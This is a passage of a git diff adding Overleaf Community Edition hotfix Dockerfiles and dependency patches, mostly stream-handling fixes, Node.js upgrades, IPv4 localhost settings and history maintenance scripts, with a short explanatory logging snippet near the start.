@@ +FROM sharelatex/sharelatex:4.1.4 + +# Patch: Change streaming compression in history-v1 +COPY pr_15445.patch . 
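The pr_15409 and pr_15410 patches above bracket each async storage call with 'started'/'finished' debug logs so that stuck requests can be located in the logs. A minimal standalone sketch of that pattern, assuming an @overleaf/logger-style logger with a debug(fields, message) signature (withDebugLog is an illustrative helper, not part of the patches):

async function withDebugLog(logger, fields, name, fn) {
  logger.debug(fields, `${name} started`)
  try {
    return await fn()
  } finally {
    // runs whether fn resolved or threw, so "finished" always pairs with "started"
    logger.debug(fields, `${name} finished`)
  }
}

// e.g. await withDebugLog(logger, { projectId, hash }, 'getString',
//        () => blobStore.getString(hash))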
+RUN patch -p0 < pr_15445.patch diff --git a/server-ce/hotfix/4.1.5/pr_15445.patch b/server-ce/hotfix/4.1.5/pr_15445.patch new file mode 100644 index 0000000..1dcd18d --- /dev/null +++ b/server-ce/hotfix/4.1.5/pr_15445.patch @@ -0,0 +1,44 @@ +--- services/history-v1/storage/lib/history_store.js ++++ services/history-v1/storage/lib/history_store.js +@@ -103,11 +103,11 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + assert.object(rawHistory, 'bad rawHistory') + + const key = getKey(projectId, chunkId) +- const stream = streams.gzipStringToStream(JSON.stringify(rawHistory)) + + logger.debug({ projectId, chunkId }, 'storeRaw started') + return BPromise.resolve() +- .then(() => ++ .then(() => streams.gzipStringToStream(JSON.stringify(rawHistory))) ++ .then(stream => + persistor.sendStream(BUCKET, key, stream, { + contentType: 'application/json', + contentEncoding: 'gzip', +--- services/history-v1/storage/lib/streams.js ++++ services/history-v1/storage/lib/streams.js +@@ -79,8 +79,15 @@ function gunzipStreamToBuffer(readStream) { + exports.gunzipStreamToBuffer = gunzipStreamToBuffer + + function gzipStringToStream(string) { +- const gzip = zlib.createGzip() +- return new ReadableString(string).pipe(gzip) ++ return new BPromise(function (resolve, reject) { ++ zlib.gzip(Buffer.from(string), function (error, result) { ++ if (error) { ++ reject(error) ++ } else { ++ resolve(new ReadableString(result)) ++ } ++ }) ++ }) + } + + /** +@@ -88,6 +95,6 @@ function gzipStringToStream(string) { + * + * @function + * @param {string} string +- * @return {stream.Writable} ++ * @return {Promise.} + */ + exports.gzipStringToStream = gzipStringToStream diff --git a/server-ce/hotfix/4.1.6/Dockerfile b/server-ce/hotfix/4.1.6/Dockerfile new file mode 100644 index 0000000..33c19af --- /dev/null +++ b/server-ce/hotfix/4.1.6/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.1.5 + +# Adds missing dependency patches +ADD patches /overleaf/patches +RUN npm run postinstall diff --git a/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch new file mode 100644 index 0000000..bbf8a8f --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +index a293298..df21af6 100644 +--- a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-const {PassThrough} = require('stream'); ++const { PassThrough, pipeline } = require('stream'); + const debug = require('debug')('retry-request'); + const extend = require('extend'); + +@@ -166,7 +166,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -232,7 +232,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. 
+ if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', err => { + retryStream.destroy(err); + }); diff --git a/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch new file mode 100644 index 0000000..738eef5 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch @@ -0,0 +1,50 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +index a2251ca..e29e796 100644 +--- a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); +- // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ const requestStream = new stream_1.PassThrough(); ++ // // eslint-disable-next-line @typescript-eslint/no-explicit-any ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + (0, node_fetch_1.default)(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/server-ce/hotfix/4.1.6/patches/README.md b/server-ce/hotfix/4.1.6/patches/README.md new file mode 100644 index 0000000..c158e27 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/README.md @@ -0,0 +1 @@ +The patches in this folder are applied by `patch-package` to dependencies, particularly those which need changes that are difficult to apply upstream. diff --git a/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch b/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch new file mode 100644 index 0000000..b41d212 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch @@ -0,0 +1,44 @@ +diff --git a/node_modules/body-parser/lib/read.js b/node_modules/body-parser/lib/read.js +index fce6283..6131c31 100644 +--- a/node_modules/body-parser/lib/read.js ++++ b/node_modules/body-parser/lib/read.js +@@ -18,7 +18,7 @@ var iconv = require('iconv-lite') + var onFinished = require('on-finished') + var unpipe = require('unpipe') + var zlib = require('zlib') +- ++var Stream = require('stream') + /** + * Module exports. 
+ */ +@@ -166,25 +166,25 @@ function contentstream (req, debug, inflate) { + case 'deflate': + stream = zlib.createInflate() + debug('inflate body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'gzip': + stream = zlib.createGunzip() + debug('gunzip body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'identity': + stream = req + stream.length = length +- break ++ return req + default: + throw createError(415, 'unsupported content encoding "' + encoding + '"', { + encoding: encoding, + type: 'encoding.unsupported' + }) + } +- +- return stream ++ var pass = new Stream.PassThrough(); Stream.pipeline(req, stream, pass, () => {}) ++ return pass + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch b/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch new file mode 100644 index 0000000..a7e0db2 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/express/node_modules/finalhandler/index.js b/node_modules/express/node_modules/finalhandler/index.js +index f628e42..72f17d6 100644 +--- a/node_modules/express/node_modules/finalhandler/index.js ++++ b/node_modules/express/node_modules/finalhandler/index.js +@@ -125,7 +125,7 @@ function finalhandler (req, res, options) { + // cannot actually respond + if (headersSent(res)) { + debug('cannot %d after headers sent', status) +- req.socket.destroy() ++ if (req.socket) req.socket.destroy() + return + } + diff --git a/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch b/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch new file mode 100644 index 0000000..323c6ea --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch @@ -0,0 +1,57 @@ +diff --git a/node_modules/express/node_modules/send/index.js b/node_modules/express/node_modules/send/index.js +index 89afd7e..de56daf 100644 +--- a/node_modules/express/node_modules/send/index.js ++++ b/node_modules/express/node_modules/send/index.js +@@ -789,29 +789,29 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // cleanup +- function cleanup () { +- destroy(stream, true) +- } +- +- // response finished, cleanup +- onFinished(res, cleanup) +- +- // error handling +- stream.on('error', function onerror (err) { +- // clean up stream early +- cleanup() +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // cleanup ++ // function cleanup () { ++ // destroy(stream, true) ++ // } ++ // ++ // // response finished, cleanup ++ // onFinished(res, cleanup) ++ // ++ // // error handling ++ // stream.on('error', function onerror (err) { ++ // // clean up stream early ++ // cleanup() ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch b/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch new file mode 100644 index 0000000..74f7461 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/finalhandler/index.js b/node_modules/finalhandler/index.js +index 5673507..40f4684 100644 +--- 
a/node_modules/finalhandler/index.js ++++ b/node_modules/finalhandler/index.js +@@ -125,7 +125,7 @@ function finalhandler (req, res, options) { + // cannot actually respond + if (headersSent(res)) { + debug('cannot %d after headers sent', status) +- req.socket.destroy() ++ if (req.socket) req.socket.destroy() + return + } + diff --git a/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch b/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch new file mode 100644 index 0000000..7c13376 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/forwarded/index.js b/node_modules/forwarded/index.js +index b2b6bdd..75e6254 100644 +--- a/node_modules/forwarded/index.js ++++ b/node_modules/forwarded/index.js +@@ -46,7 +46,7 @@ function forwarded (req) { + function getSocketAddr (req) { + return req.socket + ? req.socket.remoteAddress +- : req.connection.remoteAddress ++ : req.connection && req.connection.remoteAddress + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch b/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch new file mode 100644 index 0000000..d8bc681 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch @@ -0,0 +1,9 @@ +diff --git a/node_modules/ngcomponent/index.ts b/node_modules/ngcomponent/index.ts +index 5fe33c5..8e1c6fc 100644 +--- a/node_modules/ngcomponent/index.ts ++++ b/node_modules/ngcomponent/index.ts +@@ -1,3 +1,4 @@ ++// @ts-nocheck + import { IChangesObject } from 'angular' + import assign = require('lodash/assign') + import mapValues = require('lodash/mapValues') diff --git a/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch b/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch new file mode 100644 index 0000000..8707726 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch @@ -0,0 +1,76 @@ +diff --git a/node_modules/node-fetch/lib/index.js b/node_modules/node-fetch/lib/index.js +index e5b04f1..8c80924 100644 +--- a/node_modules/node-fetch/lib/index.js ++++ b/node_modules/node-fetch/lib/index.js +@@ -545,8 +545,8 @@ function clone(instance) { + // tee instance body + p1 = new PassThrough(); + p2 = new PassThrough(); +- body.pipe(p1); +- body.pipe(p2); ++ Stream.pipeline(body, p1, () => {}); ++ Stream.pipeline(body, p2, () => {}); + // set instance body to teed body and return the other teed body + instance[INTERNALS].body = p1; + body = p2; +@@ -648,14 +648,14 @@ function writeToStream(dest, instance) { + // body is null + dest.end(); + } else if (isBlob(body)) { +- body.stream().pipe(dest); ++ Stream.pipeline(body.stream(), dest, () => {}); + } else if (Buffer.isBuffer(body)) { + // body is buffer + dest.write(body); + dest.end(); + } else { + // body is stream +- body.pipe(dest); ++ Stream.pipeline(body, dest, () => {}); + } + } + +@@ -1594,7 +1594,7 @@ function fetch(url, opts) { + res.once('end', function () { + if (signal) signal.removeEventListener('abort', abortAndFinalize); + }); +- let body = res.pipe(new PassThrough$1()); ++ let body = new PassThrough$1(); setTimeout(() => Stream.pipeline(res, body, (err) => { if (err) req.abort() }), 0); // Note: let the call-site attach event handler to "body" before we start streaming. 
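The dependency patches above systematically replace source.pipe(dest) with stream.pipeline(...). The motivation, reduced to a sketch using only the Node stdlib: pipe() neither propagates an error to the other stream nor tears it down when one side fails, while pipeline() destroys every stream in the chain and reports the first error to its callback.

const { PassThrough, pipeline } = require('stream')

const source = new PassThrough()
const dest = new PassThrough()

pipeline(source, dest, err => {
  // pipeline destroys both streams on failure and surfaces the first error here;
  // a bare source.pipe(dest) would leave dest dangling and the error unhandled
  if (err) console.error('stream failed:', err.message)
})

source.destroy(new Error('boom'))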
+ + const response_options = { + url: request.url, +@@ -1635,7 +1635,7 @@ function fetch(url, opts) { + + // for gzip + if (codings == 'gzip' || codings == 'x-gzip') { +- body = body.pipe(zlib.createGunzip(zlibOptions)); ++ const bodyGzip = zlib.createGunzip(zlibOptions); Stream.pipeline(body, bodyGzip, () => {}); body = bodyGzip; + response = new Response(body, response_options); + resolve(response); + return; +@@ -1645,13 +1645,13 @@ function fetch(url, opts) { + if (codings == 'deflate' || codings == 'x-deflate') { + // handle the infamous raw deflate response from old servers + // a hack for old IIS and Apache servers +- const raw = res.pipe(new PassThrough$1()); ++ const raw = new PassThrough$1(); setTimeout(() => Stream.pipeline(res, raw, () => {}), 0); // Note: delay piping into "raw" until we start piping into "body". + raw.once('data', function (chunk) { + // see http://stackoverflow.com/questions/37519828 + if ((chunk[0] & 0x0F) === 0x08) { +- body = body.pipe(zlib.createInflate()); ++ const bodyDeflate = zlib.createInflate(); Stream.pipeline(body, bodyDeflate, () => {}); body = bodyDeflate; + } else { +- body = body.pipe(zlib.createInflateRaw()); ++ const bodyDeflate = zlib.createInflateRaw(); Stream.pipeline(body, bodyDeflate, () => {}); body = bodyDeflate; + } + response = new Response(body, response_options); + resolve(response); +@@ -1661,7 +1661,7 @@ function fetch(url, opts) { + + // for br + if (codings == 'br' && typeof zlib.createBrotliDecompress === 'function') { +- body = body.pipe(zlib.createBrotliDecompress()); ++ const bodyBrotli = zlib.createBrotliDecompress(); Stream.pipeline(body, bodyBrotli, () => {}); body = bodyBrotli; + response = new Response(body, response_options); + resolve(response); + return; diff --git a/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch b/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch new file mode 100644 index 0000000..25a571b --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/passport-oauth2/lib/utils.js b/node_modules/passport-oauth2/lib/utils.js +index 486f9e1..4584507 100644 +--- a/node_modules/passport-oauth2/lib/utils.js ++++ b/node_modules/passport-oauth2/lib/utils.js +@@ -24,7 +24,7 @@ exports.originalURL = function(req, options) { + var trustProxy = options.proxy; + + var proto = (req.headers['x-forwarded-proto'] || '').toLowerCase() +- , tls = req.connection.encrypted || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) ++ , tls = (req.connection && req.connection.encrypted) || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) + , host = (trustProxy && req.headers['x-forwarded-host']) || req.headers.host + , protocol = tls ? 
'https' : 'http' + , path = req.url || ''; diff --git a/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch b/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch new file mode 100644 index 0000000..afcf627 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch @@ -0,0 +1,9 @@ +diff --git a/node_modules/react2angular/index.tsx b/node_modules/react2angular/index.tsx +index 5cee831..a07e040 100644 +--- a/node_modules/react2angular/index.tsx ++++ b/node_modules/react2angular/index.tsx +@@ -1,3 +1,4 @@ ++// @ts-nocheck + import { IAugmentedJQuery, IComponentOptions } from 'angular' + import fromPairs = require('lodash.frompairs') + import NgComponent from 'ngcomponent' diff --git a/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch b/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch new file mode 100644 index 0000000..f3096b5 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/retry-request/index.js b/node_modules/retry-request/index.js +index 6cd6f65..39efb89 100644 +--- a/node_modules/retry-request/index.js ++++ b/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-var { PassThrough } = require('stream'); ++var { PassThrough, pipeline } = require('stream'); + var debug = require('debug')('retry-request'); + var extend = require('extend'); + +@@ -164,7 +164,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -220,7 +220,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. 
+ if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', function (err) { + retryStream.destroy(err); + }); diff --git a/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch b/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch new file mode 100644 index 0000000..1c0b779 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch @@ -0,0 +1,61 @@ +diff --git a/node_modules/send/index.js b/node_modules/send/index.js +index 06d7507..8854216 100644 +--- a/node_modules/send/index.js ++++ b/node_modules/send/index.js +@@ -795,31 +795,31 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // response finished, done with the fd +- onFinished(res, function onfinished () { +- finished = true +- destroy(stream) +- }) +- +- // error handling code-smell +- stream.on('error', function onerror (err) { +- // request already finished +- if (finished) return +- +- // clean up stream +- finished = true +- destroy(stream) +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // response finished, done with the fd ++ // onFinished(res, function onfinished () { ++ // finished = true ++ // destroy(stream) ++ // }) ++ // ++ // // error handling code-smell ++ // stream.on('error', function onerror (err) { ++ // // request already finished ++ // if (finished) return ++ // ++ // // clean up stream ++ // finished = true ++ // destroy(stream) ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch b/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch new file mode 100644 index 0000000..213ed04 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch @@ -0,0 +1,49 @@ +diff --git a/node_modules/teeny-request/build/src/index.js b/node_modules/teeny-request/build/src/index.js +index f209888..e9fe982 100644 +--- a/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); ++ const requestStream = new stream_1.PassThrough(); + // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + node_fetch_1.default(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ 
teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/server-ce/hotfix/4.2.1/Dockerfile b/server-ce/hotfix/4.2.1/Dockerfile new file mode 100644 index 0000000..2f956e7 --- /dev/null +++ b/server-ce/hotfix/4.2.1/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.2.0 diff --git a/server-ce/hotfix/4.2.2/Dockerfile b/server-ce/hotfix/4.2.2/Dockerfile new file mode 100644 index 0000000..4af80fa --- /dev/null +++ b/server-ce/hotfix/4.2.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.2.1 + +# Patch: https://github.com/overleaf/internal/pull/16956 +COPY pr_16956.patch . +RUN patch -p0 < pr_16956.patch diff --git a/server-ce/hotfix/4.2.2/pr_16956.patch b/server-ce/hotfix/4.2.2/pr_16956.patch new file mode 100644 index 0000000..884f2a6 --- /dev/null +++ b/server-ce/hotfix/4.2.2/pr_16956.patch @@ -0,0 +1,34 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -8,7 +8,6 @@ const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') + const CollaboratorsInviteHandler = require('../Collaborators/CollaboratorsInviteHandler') + const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') + const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +-const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + const SessionManager = require('../Authentication/SessionManager') + const Errors = require('../Errors/Errors') + const DocstoreManager = require('../Docstore/DocstoreManager') +@@ -178,7 +177,7 @@ async function _buildJoinProjectView(req, projectId, userId) { + await CollaboratorsGetter.promises.getInvitedMembersWithPrivilegeLevels( + projectId + ) +- const token = TokenAccessHandler.getRequestToken(req, projectId) ++ const token = req.headers['x-sl-anonymous-access-token'] + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -213,10 +213,9 @@ const TokenAccessHandler = { + + getRequestToken(req, projectId) { + const token = +- (req.session && +- req.session.anonTokenAccess && +- req.session.anonTokenAccess[projectId.toString()]) || +- req.headers['x-sl-anonymous-access-token'] ++ req.session && ++ req.session.anonTokenAccess && ++ req.session.anonTokenAccess[projectId.toString()] + return token + }, diff --git a/server-ce/hotfix/4.2.3/Dockerfile b/server-ce/hotfix/4.2.3/Dockerfile new file mode 100644 index 0000000..06c526d --- /dev/null +++ b/server-ce/hotfix/4.2.3/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:4.2.2 + +# Upgrade Node.js to version 18.19.1 +RUN apt-get update \ +&& apt-get install -y nodejs=18.19.1-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* diff --git a/server-ce/hotfix/4.2.4/Dockerfile b/server-ce/hotfix/4.2.4/Dockerfile new file mode 100644 index 0000000..30d3be8 --- /dev/null +++ b/server-ce/hotfix/4.2.4/Dockerfile @@ -0,0 +1,23 @@ +FROM sharelatex/sharelatex:4.2.3 + +# Upgrade Node.js to version 18.20.2 +RUN apt-get update \ +&& apt-get install -y nodejs=18.20.2-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* + +# Patch: force services to 
use ipv4 in server-ce container +ADD env.sh /etc/sharelatex/env.sh +COPY pr_17601-1.patch /etc/sharelatex/ +RUN cd /etc/sharelatex && patch -p0 < pr_17601-1.patch && rm pr_17601-1.patch +COPY pr_17601-2.patch /overleaf/cron/ +RUN cd /overleaf/cron && patch -p0 < pr_17601-2.patch && rm pr_17601-2.patch +COPY pr_17601-3.patch /etc/service/ +RUN cd /etc/service && patch -p0 < pr_17601-3.patch && rm pr_17601-3.patch + +# Add history utility scripts +ADD bin/* /overleaf/bin/ + +# Patch: https://github.com/overleaf/internal/pull/17885 +COPY pr_17885.patch . +RUN patch -p0 -d /etc/my_init.pre_shutdown.d < pr_17885.patch \ +&& rm pr_17885.patch diff --git a/server-ce/hotfix/4.2.4/bin/flush-history-queues b/server-ce/hotfix/4.2.4/bin/flush-history-queues new file mode 100755 index 0000000..fcfe33b --- /dev/null +++ b/server-ce/hotfix/4.2.4/bin/flush-history-queues @@ -0,0 +1,7 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/hotfix/4.2.4/bin/force-history-resyncs b/server-ce/hotfix/4.2.4/bin/force-history-resyncs new file mode 100755 index 0000000..c43b1ce --- /dev/null +++ b/server-ce/hotfix/4.2.4/bin/force-history-resyncs @@ -0,0 +1,7 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/hotfix/4.2.4/env.sh b/server-ce/hotfix/4.2.4/env.sh new file mode 100644 index 0000000..2dee36a --- /dev/null +++ b/server-ce/hotfix/4.2.4/env.sh @@ -0,0 +1,14 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export SPELLING_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/hotfix/4.2.4/pr_17601-1.patch b/server-ce/hotfix/4.2.4/pr_17601-1.patch new file mode 100644 index 0000000..3f8c136 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-1.patch @@ -0,0 +1,31 @@ +--- settings.js ++++ settings.js +@@ -256,16 +256,16 @@ const settings = { + + apis: { + web: { +- url: 'http://localhost:3000', ++ url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, +- url: 'http://localhost:3054', ++ url: 'http://127.0.0.1:3054', + }, + v1_history: { +- url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', ++ url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( +@@ -409,7 +409,7 @@ if ( + + if (parse(process.env.OVERLEAF_IS_SERVER_PRO) === true) { + settings.bypassPercentageRollouts = true +- settings.apis.references = { url: 'http://localhost:3040' } ++ settings.apis.references = { url: 'http://127.0.0.1:3040' } + } + + // Compiler diff --git a/server-ce/hotfix/4.2.4/pr_17601-2.patch b/server-ce/hotfix/4.2.4/pr_17601-2.patch new file mode 100644 index 0000000..2322ad9 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-2.patch @@ -0,0 +1,63 @@ +--- deactivate-projects.sh ++++ deactivate-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' 
